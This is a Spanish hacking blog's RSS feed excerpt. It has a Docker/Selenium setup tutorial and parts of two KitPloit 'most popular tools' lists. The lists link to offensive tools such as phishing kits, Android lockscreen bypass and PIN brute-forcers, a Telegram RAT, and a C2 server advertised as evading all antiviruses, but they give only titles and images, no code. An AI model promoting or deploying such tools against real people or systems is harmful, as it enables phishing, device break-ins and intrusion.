  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVEss8NeY0Dfecg_y5kjJZk78TmSP1bSWO-iHzgRACORaHN7FJQwytsMLcxcN0rJ5EoIeQMyHardmz7p1dBs_3z4QNY0BqtzNIkMd155Aneauyfxrg-Qrfisl3L1JKkodEPs1gFeyBq6ecUxRzIvh4khdYmjh8o2GB4ZBmPGKdaLdsjyZ-VAo6wkB5aX2Y/s1454/16-RedTeam-Physical-Tools_1-761767.jpeg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="690" data-original-width="1454" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVEss8NeY0Dfecg_y5kjJZk78TmSP1bSWO-iHzgRACORaHN7FJQwytsMLcxcN0rJ5EoIeQMyHardmz7p1dBs_3z4QNY0BqtzNIkMd155Aneauyfxrg-Qrfisl3L1JKkodEPs1gFeyBq6ecUxRzIvh4khdYmjh8o2GB4ZBmPGKdaLdsjyZ-VAo6wkB5aX2Y/w400-h190/16-RedTeam-Physical-Tools_1-761767.jpeg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/08/dnswatch-dns-traffic-sniffer-and.html" target="_blank"&gt;DNSWatch - DNS Traffic Sniffer and Analyzer&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfdQzSJLqJItAyO5-zKll07vltpiZb3RA7ErWl-OwEGcTfHpvrmsx-3C56dazVd-vjLU7BQg-iWcu_gYFY8OU8YnXYk_XKYJM8HVM_UvVot4ixjfQT_Atq9KNBJUapBubSE0AvaR7fWfeq-loJhVs35KebKq0uO6BgniTHtkLMRHHTiCbFS1skZ9v2QBu1/s1547/17-DNSWatch_1_dnswatch-721786.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="881" data-original-width="1547" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfdQzSJLqJItAyO5-zKll07vltpiZb3RA7ErWl-OwEGcTfHpvrmsx-3C56dazVd-vjLU7BQg-iWcu_gYFY8OU8YnXYk_XKYJM8HVM_UvVot4ixjfQT_Atq9KNBJUapBubSE0AvaR7fWfeq-loJhVs35KebKq0uO6BgniTHtkLMRHHTiCbFS1skZ9v2QBu1/w400-h228/17-DNSWatch_1_dnswatch-721786.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/02/ipgeo-tool-to-extract-ip-addresses-from.html" target="_blank"&gt;IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCBIxwU9aM09siADkH-9ZWeEyOIsbxvg8TgTwPY1fmCVKbHVyeNFp5ezTGEyfFOltkGPcUSNpHaKxlAn6Cj1QF9tP2pZoK0mGOjQWaH3rYPfXa0ChdhGXJ-lZ0gI4QDUon3zptITBIKcohFdzSNjGan_O0RztOAuOzq2rwkzXzgZb7m7l4LeJtA4ujA6gr/s813/18-IpGeo_1-757055.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="467" data-original-width="813" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCBIxwU9aM09siADkH-9ZWeEyOIsbxvg8TgTwPY1fmCVKbHVyeNFp5ezTGEyfFOltkGPcUSNpHaKxlAn6Cj1QF9tP2pZoK0mGOjQWaH3rYPfXa0ChdhGXJ-lZ0gI4QDUon3zptITBIKcohFdzSNjGan_O0RztOAuOzq2rwkzXzgZb7m7l4LeJtA4ujA6gr/w400-h230/18-IpGeo_1-757055.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/07/telegramrat-cross-platform-telegram.html" target="_blank"&gt;TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAZvUymlpE84FT4CtototxjFZ3Rk1XhYXeneflO16PxV7WhsgNfeCaTy1xmCMrbRGk0oWW4an_JV7vbUuyUHCZ8KmEZ85CHG6DuPFZuAtjB92INXCdXTzC5DSRdS6UVZZbXcpnJzv6oVE2Yx7bQdvrBOJ-OoYeemQK5dHfI9W7xIAbsy6wYL1ElDx7KnV7/s666/19-TelegramRAT_1-715463.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="219" data-original-width="666" height="131" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAZvUymlpE84FT4CtototxjFZ3Rk1XhYXeneflO16PxV7WhsgNfeCaTy1xmCMrbRGk0oWW4an_JV7vbUuyUHCZ8KmEZ85CHG6DuPFZuAtjB92INXCdXTzC5DSRdS6UVZZbXcpnJzv6oVE2Yx7bQdvrBOJ-OoYeemQK5dHfI9W7xIAbsy6wYL1ElDx7KnV7/w400-h131/19-TelegramRAT_1-715463.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/06/xss-exploitation-tool-xss-exploitation.html" target="_blank"&gt;XSS-Exploitation-Tool - An XSS Exploitation Tool&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9pUZOp2XpKwtVA32johjUd6SEmZWV89nCR_el-CC-QleLBSGvUuXPwoxXSuPk83HlVjzfR22PsV1bY_uG6ZgXDUT-twX7FjGTHaHevDhEZ4uyYrm8DZ0UAVLd5sgokclXKrm9mzLmyzXXb_QxlbTSUV786opW7cEn_8tu2TzLoKXLwXM6-geUPle-iSbw/s1600/20-XSS-Exploitation-Tool_2_details_browser-785872.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="704" data-original-width="1600" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9pUZOp2XpKwtVA32johjUd6SEmZWV89nCR_el-CC-QleLBSGvUuXPwoxXSuPk83HlVjzfR22PsV1bY_uG6ZgXDUT-twX7FjGTHaHevDhEZ4uyYrm8DZ0UAVLd5sgokclXKrm9mzLmyzXXb_QxlbTSUV786opW7cEn_8tu2TzLoKXLwXM6-geUPle-iSbw/w400-h176/20-XSS-Exploitation-Tool_2_details_browser-785872.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/ol&gt;
[+] Saludos y feliz año nuevo!!</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYnD1fH09GU2A-MQc62AVEhnIlY4iMYS6mBX8L05ZBXaIvHeeFKpydR2C3uTcRdj7Iq4pTQdbNXwIVpK2vhwLVR9HgHiHjmfa0HR563fLiKlMTXPpDhcQTfGTsOE6OvTilGHH0iV_HPVIBio_I9qGJPuGRMTWb7qhqJM44hdKcll0Y_itCDOsFsw0___X2/s72-w640-h424-c/most-popular-tools-2023.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Docker y docker-compose para proyecto con Selenium y Python</title><link>http://www.blackploit.com/2023/11/docker-y-docker-compose-para-proyecto.html</link><category>Dev</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Wed, 22 Nov 2023 21:54:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-4066841340238156374</guid><description>&lt;p&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAk-HkuxaEqnpdaw6-67TJ7ihyphenhyphen8l0n9YJCVtwRqDogrbQN62ecU6TPNGJ2J2PcUAWYCdGlWg_lf9AKJOnccTIQC4amEberjZ7KB_F4ec0zRFzlAyuZrZ1Xk6YX0YetVK_EWgtbfUK_u8Cu4_HV9_UtB97ntCI7Yr5EecjySAgF2at7RwrUzd9rUanfsLW6/s1792/docker-selenium-python.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAk-HkuxaEqnpdaw6-67TJ7ihyphenhyphen8l0n9YJCVtwRqDogrbQN62ecU6TPNGJ2J2PcUAWYCdGlWg_lf9AKJOnccTIQC4amEberjZ7KB_F4ec0zRFzlAyuZrZ1Xk6YX0YetVK_EWgtbfUK_u8Cu4_HV9_UtB97ntCI7Yr5EecjySAgF2at7RwrUzd9rUanfsLW6/w640-h366/docker-selenium-python.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Hace un tiempo estaba desarrollando un bot que interactuaba con una web. El bot estaba hecho en python y Selenium. Quería dockerizar la aplicación para correrla con un solo comando en cualquier parte y no me encontré con ninguna solución u opción que funcionara o que no tuviera que usar una imagen custom de docker, por lo que hize mi propia versión que corre con un docker seguro no custom en el cual se descargan e instalan todo lo necesario para poder correr tu script en python con selenium. También cree su docker-compose para hacerlo aún más sencillo y poder correrlo en modo gráfico y ver el navegador por pantalla si estoy testeando.&lt;/p&gt;&lt;span&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/span&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Aquí dejo lo archivos:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;i&gt;&lt;b&gt;requeriments.txt&lt;/b&gt;&lt;/i&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;selenium==4.12.0&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Se puede usar con otras versiones de Selenium.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;&lt;i&gt;&lt;b&gt;main.py&lt;/b&gt;&lt;/i&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium import webdriver
from selenium.webdriver import ActionChains
...

def main():
	tu_codigo.....

if __name__ == '__main__':
    main()
&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;p&gt;&lt;b&gt;&lt;i&gt;Dockerfile&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;FROM python:3.9

# install google chrome
RUN echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" | \
    tee -a /etc/apt/sources.list.d/google.list &amp;amp;&amp;amp; \
    wget -q -O - https://dl.google.com/linux/linux_signing_key.pub | \
    apt-key add - &amp;amp;&amp;amp; \
    apt-get update &amp;amp;&amp;amp; \
    apt-get install -y google-chrome-stable libxss1


RUN BROWSER_MAJOR=$(google-chrome --version | sed 's/Google Chrome \([0-9]*\).*/\1/g') &amp;amp;&amp;amp; \
    wget https://googlechromelabs.github.io/chrome-for-testing/LATEST_RELEASE_${BROWSER_MAJOR} -O chrome_version &amp;amp;&amp;amp; \
    wget https://storage.googleapis.com/chrome-for-testing-public/`cat chrome_version`/linux64/chromedriver-linux64.zip &amp;amp;&amp;amp; \
    unzip chromedriver-linux64.zip &amp;amp;&amp;amp; \
    mv chromedriver-linux64/chromedriver /usr/local/bin/ &amp;amp;&amp;amp; \
    DRIVER_MAJOR=$(chromedriver --version | sed 's/ChromeDriver \([0-9]*\).*/\1/g') &amp;amp;&amp;amp; \
    echo "chrome version: $BROWSER_MAJOR" &amp;amp;&amp;amp; \
    echo "chromedriver version: $DRIVER_MAJOR" &amp;amp;&amp;amp; \
    if [ $BROWSER_MAJOR != $DRIVER_MAJOR ]; then echo "VERSION MISMATCH"; exit 1; fi


COPY requirements.txt /app/
WORKDIR /app
RUN pip install --no-cache-dir -r requirements.txt

COPY main.py .

ENTRYPOINT ["python", "main.py"]&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;&lt;i&gt;docker-compose.yml&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;version: '3.8'

services:
  selenium-script:
    build: .
    environment:
      - DISPLAY=unix$DISPLAY
    volumes:
      - /tmp/.X11-unix:/tmp/.X11-unix
      - .:/app
    privileged: true
    stdin_open: true
    tty: true
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;&lt;b&gt;
Modo de uso&lt;/b&gt;&lt;/h3&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Para correrlo debes ejecutar:&lt;/div&gt;&lt;div&gt;




&lt;pre&gt;&lt;code&gt;docker-compose run selenium-script&lt;/code&gt;&lt;/pre&gt;



&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Si quieres poder ver el navegador cuando corras el docker debes darle permiso al usuario docker para que acceda al servidor x11, que es la base de la interfaz gráfica de usuario en estos sistemas Unix.&lt;/div&gt;&lt;pre&gt;&lt;code&gt;xhost +local:docker&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;

&lt;br /&gt;

&lt;br /&gt;Espero les sirva

&lt;br /&gt;Saludos!!!</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAk-HkuxaEqnpdaw6-67TJ7ihyphenhyphen8l0n9YJCVtwRqDogrbQN62ecU6TPNGJ2J2PcUAWYCdGlWg_lf9AKJOnccTIQC4amEberjZ7KB_F4ec0zRFzlAyuZrZ1Xk6YX0YetVK_EWgtbfUK_u8Cu4_HV9_UtB97ntCI7Yr5EecjySAgF2at7RwrUzd9rUanfsLW6/s72-w640-h366-c/docker-selenium-python.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Las 20 herramientas de hacking más populares del 2022</title><link>http://www.blackploit.com/2022/12/las-20-herramientas-de-hacking-mas.html</link><category>Blackploit</category><category>Hack T00LZ</category><category>Herramientas</category><category>KitPloit</category><category>Noticias</category><category>Seguridad</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Thu, 29 Dec 2022 08:30:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-8712990559327420364</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwYixegDWiORWg25uGgur5DIP4TAFHSKfLHtrsPDKPDcgdtmze4sbhRqHyRMJcdEYMeuzFFUlXpg99dB-djW5NiJS9AQwGNFL4A7cBFpdMiXGcsC7XEipN2HYvsJjXO_10hutQ9A2TeMiyZF_3F01Yl7sk8fzxkMmuwqc6cgKFhtSsdSW2zsv8Gf8m4Q/s1200/tools-2022-title-compress.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="800" data-original-width="1200" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwYixegDWiORWg25uGgur5DIP4TAFHSKfLHtrsPDKPDcgdtmze4sbhRqHyRMJcdEYMeuzFFUlXpg99dB-djW5NiJS9AQwGNFL4A7cBFpdMiXGcsC7XEipN2HYvsJjXO_10hutQ9A2TeMiyZF_3F01Yl7sk8fzxkMmuwqc6cgKFhtSsdSW2zsv8Gf8m4Q/w640-h426/tools-2022-title-compress.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;
En un ranking elaborado por &lt;a href="https://www.kitploit.com/" target="_blank"&gt;&lt;b&gt;Kitploit&lt;/b&gt;&lt;/a&gt;, nos muestran las 20 herramientas más populares (con más visitas) durante el 2022. Es una lista que merece ser revisada, donde se encuentran herramientas de diferentes desarrolladores quienes dedican su tiempo y esfuerzo a colaborar con la comunidad.&amp;nbsp;&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Destacan herramientas de &lt;b&gt;Information Gathering&lt;/b&gt;, &lt;b&gt;ingeniería social (&lt;i&gt;phishing&lt;/i&gt;)&lt;/b&gt;, entre otras. Sin más, los dejo con la lista:&lt;/div&gt;
&lt;!--more--&gt;&lt;br /&gt;


&lt;ol&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2020/03/zphisher-automated-phishing-tool.html" target="_blank"&gt;Zphisher - Automated Phishing Tool&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEiM9qBg00LJf2pmfhTcm1uD7HD198IijaLQdQJi9aQJO2R4xkOlShU6y9gfkbuOF2z1UqryRUx2tb5nIPSpGOvtAzwQnaYAmaKw0-191aZKGreJOgGGpfddmUD9YTf9jffVS2di28q8mg6-v6BQW8r5267lJO9et-tSQMHf4aqhP4D_GZFWr5l028iunw=s537" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="537" data-original-width="356" height="400" src="https://blogger.googleusercontent.com/img/a/AVvXsEiM9qBg00LJf2pmfhTcm1uD7HD198IijaLQdQJi9aQJO2R4xkOlShU6y9gfkbuOF2z1UqryRUx2tb5nIPSpGOvtAzwQnaYAmaKw0-191aZKGreJOgGGpfddmUD9YTf9jffVS2di28q8mg6-v6BQW8r5267lJO9et-tSQMHf4aqhP4D_GZFWr5l028iunw=s400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/05/cilocks-android-lockscreen-bypass.html" target="_blank"&gt;CiLocks - Android LockScreen Bypass&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

     &lt;div class="separator" style="clear: both;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimI4byI9yaOFCefKIYYzWSP69raXlL6FHhM4hnO-GrKK_lnnRzJQDYvp0VF80YkRAvlO7Wug6WDyYfSTosTzPWk9cCVjUeI7Ujm-xGLoknRFTk5qCZ4ARapO5jYbvsRRNxLbVmWYT5xQhk58z_C-giT2DZV9HS7d_VaYWwnj68-zKMlbHZWb-97M65Ew/s640/02_CiLocks_1_Screenshot_2021-05-02_14-32-27.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="505" data-original-width="640" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimI4byI9yaOFCefKIYYzWSP69raXlL6FHhM4hnO-GrKK_lnnRzJQDYvp0VF80YkRAvlO7Wug6WDyYfSTosTzPWk9cCVjUeI7Ujm-xGLoknRFTk5qCZ4ARapO5jYbvsRRNxLbVmWYT5xQhk58z_C-giT2DZV9HS7d_VaYWwnj68-zKMlbHZWb-97M65Ew/w400-h316/02_CiLocks_1_Screenshot_2021-05-02_14-32-27.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEhkmsrW56PMBXLP5uKH0oNAxz_4kxZHpso2rWvSGDqwqZkXLMuJbfvFBTmQJbj2Ed-uxLYsOtTkfKhsFuzW5VfTqPFRSy3ofw2Rk7jORqxER45YAMrlpml_nxG8Y4TRHV7uePucFgWYaA_92K28CQ0YCmnnghp1_G0abjVg8Qx384AVDP29q9dsRXeNxg=s639" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/06/arkhota-web-brute-forcer-for-android.html" target="_blank"&gt;Arkhota - A Web Brute Forcer For Android&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipZ3QO-u07y3_l3_uRdIMD7PdVROF6NU-gk8WHjWj-YWgfQ3uPGBXhX9C1aqiv0BfgPjmI4Ue84MIEND4crmRqyqp_sO479vvfy57hTl63cEKk4C59xONREsOqnozKm6WhDaVr2Xlw9hL70giI32POq9mdq8vQdzP4fN83tWuvge_gDzJUcv5YzemgPQ/s640/03_Arkhota_1_banner-721104.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="360" data-original-width="640" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipZ3QO-u07y3_l3_uRdIMD7PdVROF6NU-gk8WHjWj-YWgfQ3uPGBXhX9C1aqiv0BfgPjmI4Ue84MIEND4crmRqyqp_sO479vvfy57hTl63cEKk4C59xONREsOqnozKm6WhDaVr2Xlw9hL70giI32POq9mdq8vQdzP4fN83tWuvge_gDzJUcv5YzemgPQ/w400-h225/03_Arkhota_1_banner-721104.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2022/10/godgenesis-python3-based-c2-server-to.html" target="_blank"&gt;GodGenesis - A Python3 Based C2 Server To Make Life Of Red Teamer A Bit Easier. The Payload Is Capable To Bypass All The Known Antiviruses And Endpoints&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8beGylz9vWZN-j572jizgdDxVptlDQtukM-XPIraBjLPDVirL9mGNdjp2whsz633XMBHQlvVN9B1cbJkzonHRcy-JYKxbAJ07JTPZn-e_1PL9HF9XPCNS8W7R1Y4JA4WfCP860M7E5zay1VDwEwzbAJBmJyJjvK6R3z-Z8o3VAdinix0JCDtH2E-Ycw/s640/04_GodGenesis_1-737165.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="509" data-original-width="640" height="319" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8beGylz9vWZN-j572jizgdDxVptlDQtukM-XPIraBjLPDVirL9mGNdjp2whsz633XMBHQlvVN9B1cbJkzonHRcy-JYKxbAJ07JTPZn-e_1PL9HF9XPCNS8W7R1Y4JA4WfCP860M7E5zay1VDwEwzbAJBmJyJjvK6R3z-Z8o3VAdinix0JCDtH2E-Ycw/w400-h319/04_GodGenesis_1-737165.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2020/10/advphishing-this-is-advance-phishing.html" target="_blank"&gt;AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikV-Rwzk9sG4UI8N0kmp_ki8baEy6nqx2C07ZOi15pEv8mkpvOFwBMByV9DVoQlfUB8CHCfoXH8tWBFqQkeC1vFe94OEQz4jJhJ2ebWg-jF5dvuMiK-PAsEV_w2FXLZ_BdlcehSZroc5Qd23AmRzhlgRFfug1R6BjbRQY3ITKjje80i0TwsGNFyKalxQ/s640/05_AdvPhishing_9.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="563" data-original-width="640" height="353" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikV-Rwzk9sG4UI8N0kmp_ki8baEy6nqx2C07ZOi15pEv8mkpvOFwBMByV9DVoQlfUB8CHCfoXH8tWBFqQkeC1vFe94OEQz4jJhJ2ebWg-jF5dvuMiK-PAsEV_w2FXLZ_BdlcehSZroc5Qd23AmRzhlgRFfug1R6BjbRQY3ITKjje80i0TwsGNFyKalxQ/w400-h353/05_AdvPhishing_9.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/04/modded-ubuntu-run-ubuntu-gui-on-your.html" target="_blank"&gt;Modded-Ubuntu - Run Ubuntu GUI On Your Termux With Much Features&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMuqQO6xrlptl9eEFwSV0OJBXza_Bo0s3dipZ8siOTD8pIzVkMX38p-M-ThV7hY2u3B7XqYqLM0MBu8zl4aSQJIx2YErKT4c6DgfZl_m8WglCKxeJs6O1ZAUBUfBqzdToDFq6mSmEofDy0BI6aBiGVOCmSvyHwllnJcboxxnBUS8TUOIrggwZ76Z9w7g/s640/06_modded-ubuntu_1_image.jpeg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="288" data-original-width="640" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMuqQO6xrlptl9eEFwSV0OJBXza_Bo0s3dipZ8siOTD8pIzVkMX38p-M-ThV7hY2u3B7XqYqLM0MBu8zl4aSQJIx2YErKT4c6DgfZl_m8WglCKxeJs6O1ZAUBUfBqzdToDFq6mSmEofDy0BI6aBiGVOCmSvyHwllnJcboxxnBUS8TUOIrggwZ76Z9w7g/w400-h180/06_modded-ubuntu_1_image.jpeg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/04/android-pin-bruteforce-unlock-android.html" target="_blank"&gt;Android-PIN-Bruteforce - Unlock An Android Phone (Or Device) By Bruteforcing The Lockscreen PIN&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
